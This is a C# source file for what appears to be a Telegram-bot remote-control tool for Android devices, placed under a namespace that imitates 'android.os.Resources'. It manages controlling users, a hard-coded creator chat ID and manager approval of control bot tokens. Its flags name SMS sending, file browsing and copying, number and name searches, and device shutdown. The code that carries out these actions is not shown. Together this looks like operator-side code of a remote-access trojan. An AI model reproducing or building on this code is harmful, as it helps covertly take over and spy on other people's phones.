using System;
using System.Collections.Generic;
using TeleSharp;
using TeleSharp.Entities;
using TeleSharp.Entities.SendEntities;

namespace android.os.Resources
{
    public class UserInformation
    {
        public static UserInformation FindUser(long id, UsersMode mode)
        {
            foreach (UserInformation user in (mode == UsersMode.Users) ? inf.Users : inf.MyUsers)
                if (user.ChatId == id.ToString())
                    return user;
            return null;
        }
        public void InitMessage(Message M, MessageContent MC)
        {
            if (OnSetToken)
            {
                OnSetToken = false;
                inf.Values.api.SendMessage(new SendMessageParams
                {
                    ChatId = inf.Manager.ChatId.ToString(),
                    Text = string.Format("{0}\nSet Token For: {1}\n{2}\nName: {3}\nUserName: {4}\nCurrentToken: {5}\nAre You Let?", M.Text, inf.Metods.devicename(inf.Manager.ChatId.ToString()), M.From.Id, M.From.FirstName, M.From.Username, ((inf.CTRLApi != null) ? inf.CTRLApi.token : "Not Set Yet")),
                    InlineKeyboard = new InlineKeyboardMarkup
                    {
                        InlineKeyboard = new List<List<InlineKeyboardButton>>
                        {
                            new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text="Deny",CallbackData=inf.Metods.devicename(inf.Manager.ChatId)+",notletset",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                ,new InlineKeyboardButton {Text="Allow",CallbackData=inf.Metods.devicename(inf.Manager.ChatId)+",letset",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                            }
                        }
                    }
                });
                inf.Values.api.SendMessage(new SendMessageParams
                {
                    ChatId = M.From.Id.ToString(),
                    Text = "Yor Request Has Been Sent To Manager For Let\nPlz Wait For Answer Manager"
                });
            }
            else if (M.Text == "/list")
                inf.list(M);
        }
        public void InitCallBack(CallbackQuery M)
        {
            string DevName = inf.TextBefore(',', M.Data);
            string Data = inf.TextAfter(',', M.Data);
            if (DevName == inf.Metods.devicename(M.From.Id.ToString()))
            {
                if (Data == "st")
                {
                    OnSetToken = true;
                    inf.Values.api.SendMessage(new SendMessageParams
                    {
                        ChatId = M.From.Id.ToString(),
                        Text = "Now, Send New Token Of Your Bot For Control Device On That Bot"
                    });
                }
                else if (Data == "dt")
                {
                    if (M.From.Id.ToString() == inf.Manager.ChatId)
                    {
                        inf.CTRLApi.StopUpdates();
                        inf.CTRLApi.NewMessageFromUser -= CTRLAPI.NEWMFROMUSER;
                        inf.CTRLApi.NewCallBackQuery -= CTRLAPI.NEWCALLBACK;
                        inf.CTRLApi = null;
                        inf.Values.sharep.Edit().Remove("ctrltoken").Commit();
                        inf.Values.api.AnswerCallbackQuery(M.Id, "Ok! This Device Exit From That Bot");
                    }
                    else
                        inf.Values.api.AnswerCallbackQuery(M.Id, "Only Creator Can Do This");
                }
                else if (Data == "rsbot")
                {
                    if (M.From.Id.ToString() == inf.MyManagerId || M.From.Id.ToString() == inf.Manager.ChatId)
                    {
                        inf.Values.sharep.Edit().PutBoolean("stopbot", false).Commit();
                        inf.CTRLToken = inf.Values.sharep.GetString("ctrltoken", "");
                        if (inf.CTRLToken != "")
                        {
                            inf.CTRLApi = new TeleSharp.TeleShrap(inf.CTRLToken, true);
                            inf.CTRLApi.NewMessageFromUser += CTRLAPI.NEWMFROMUSER;
                            inf.CTRLApi.NewCallBackQuery += CTRLAPI.NEWCALLBACK;
                        }
                        inf.Values.api.SendSimpleTextMessage(M.From.Id.ToString(),"This Bot Has Been Restarted",M.Message.MessageId.ToString());
                    }
                    else
                        inf.Values.api.SendSimpleTextMessage(M.From.Id.ToString(), "Only Manager Can",M.Message.MessageId.ToString());
                }
            }
        }
        internal void ClrSelf(UsersMode um)
        {
            string dirpth = Filef.CreateDir(Filef.getmainpth() + "/" + um.ToString() + "/" + ChatId);
            System.IO.Directory.Delete(dirpth, true);
            if (um == UsersMode.Users)
                inf.Users.Remove(this);
            else
                inf.MyUsers.Remove(this);
        }
        public void SaveSetting(string Value, object Key, UsersMode um)
        {
            string SavePth = Filef.CreateDir(Filef.getmainpth() + "/" + um.ToString() + "/" + ChatId) + "/";
            System.IO.File.WriteAllText(SavePth + Value, Key.ToString());
        }
        public void SaveSetting(UsersMode um)
        {
            string SavePth = Filef.CreateDir(Filef.getmainpth() + "/" + um.ToString() + "/" + ChatId) + "/";
            System.IO.File.WriteAllText(SavePth + "name", Name);
            System.IO.File.WriteAllText(SavePth + "chatid", ChatId);
            System.IO.File.WriteAllText(SavePth + "username", UserName);
        }
        public UserInformation(string ChatId)
        {
            this.ChatId = ChatId;
        }
        public string ChatId { get; set; }
        public Document FileToDownload { get; set; }
        public string Name { get; set; }
        public string UserName { get; set; }
        public bool OnSetToken { get; private set; }
        public bool OnAddChatId { get; set; }
        public bool OnForwLock { get; set; }
        public bool OnRemoveChatId { get; set; }
        public bool onimportant { get; set; }
        public bool OnRenameFile { get; set; }
        public bool OnChangeDeviceName { get; set; }
        public bool OnWritePathToSaveFile { get; set; }
        public bool OnCopy { get; set; }
        public bool OnCut { get; set; }
        public bool OnSetMaxSize { get; set; }
        public bool OnShowMessage { get; set; }
        public bool OnSendSms { get; set; }
        public bool OnExtract { get; set; }
        public bool OnSearchNum { get; set; }
        public bool OnSearchName { get; set; }
        public bool OnRestart { get; set; }
        public bool OnShutDown { get; set; }
        public string CurrentPathInFileDialog { get; set; }
        public string FilePth { get; set; }
        public bool OnSetPrivate { get; set; }
        public void SetNull()
        {
            OnCopy = OnCut = OnSearchName = OnSearchNum
                = OnSendSms = OnSetMaxSize = OnSetPrivate =
                OnRestart = OnShutDown = OnShowMessage =
                OnWritePathToSaveFile = OnExtract = OnChangeDeviceName =
                OnAddChatId = OnRemoveChatId = OnRenameFile = false;
            FilePth = CurrentPathInFileDialog = "";
        }
    }
    public class Creator
    {
        public void InitMessage(Message M, MessageContent MC)
        {
            if (User.Name == "")
                User.Name = M.From.FirstName;
            if (M.ForwardFrom != null)
                inf.forw(M, User);
            else if (M.Text.StartsWith("/"))
                inf.checkcomands(M, User);
            else
                User.InitMessage(M, MC);
        }
        public UserInformation User = null;
        public void InitCallBack(CallbackQuery M)
        {
            if (User.Name == "")
                User.Name = M.From.FirstName;
            string DevName = inf.TextBefore(',', M.Data);
            string Data = inf.TextAfter(',', M.Data);
            if (DevName == inf.Metods.devicename(M.From.Id.ToString()))
            {
                if (Data == "letset")
                {
                    inf.CTRLToken = inf.ReadLineString(M.Message.Text);
                    inf.Values.sharep.Edit().PutString("ctrltoken", inf.CTRLToken).Commit();
                    if (inf.CTRLApi != null)
                    {
                        inf.CTRLApi.StopUpdates();
                        inf.CTRLApi = null;
                    }
                    inf.CTRLApi = new TeleShrap(inf.CTRLToken, true);
                    inf.CTRLApi.Interval = TimeSpan.FromSeconds(1);
                    inf.CTRLApi.NewMessageFromUser += CTRLAPI.NEWMFROMUSER;
                    inf.CTRLApi.NewCallBackQuery += CTRLAPI.NEWCALLBACK;
                    inf.MyManagerId = inf.ReadLineString(M.Message.Text, 3);
                    inf.Values.sharep.Edit().PutString("mymanagerid", inf.MyManagerId).Commit();
                    inf.Values.api.SendMessage(new SendMessageParams
                    {
                        ChatId = inf.MyManagerId,
                        Text = "ok,Manager Allow You And Set Your Token\nNow You Can Control Device From Your Bot"
                    });
                    inf.Values.api.EditMessage(new SendMessageParams
                    {
                        ChatId = M.From.Id.ToString(),
                        Text = "Token Has Been Seted"
                       ,
                        MessageId = M.Message.MessageId.ToString()
                    });
                }
                else if (Data == "notletset")
                {
                    inf.Values.api.SendMessage(new SendMessageParams
                    {
                        ChatId = inf.MyManagerId,
                        Text = "sorry,Manager Deny You And Not Set Your Token"
                    });
                    inf.Values.api.EditMessage(new SendMessageParams
                    {
                        ChatId = M.From.Id.ToString(),
                        Text = "Token Has Not Been Seted",
                        MessageId = M.Message.MessageId.ToString()
                    });
                }
                else
                    User.InitCallBack(M);
            }
        }
        public void SaveSetting()
        {
            string SavePth = Filef.CreateDir(Filef.getmainpth() + "/Creator") + "/";
            System.IO.File.WriteAllText(SavePth + "chatid", ChatId);
        }
        public Creator(string UserName)
        {
            this.UserName = UserName;
            User = new UserInformation(ChatId)
            {
                UserName = this.UserName,
                Name = ""
            };
        }
        public string ChatId ="187895567";
        public string UserName { get; set; }
    }
}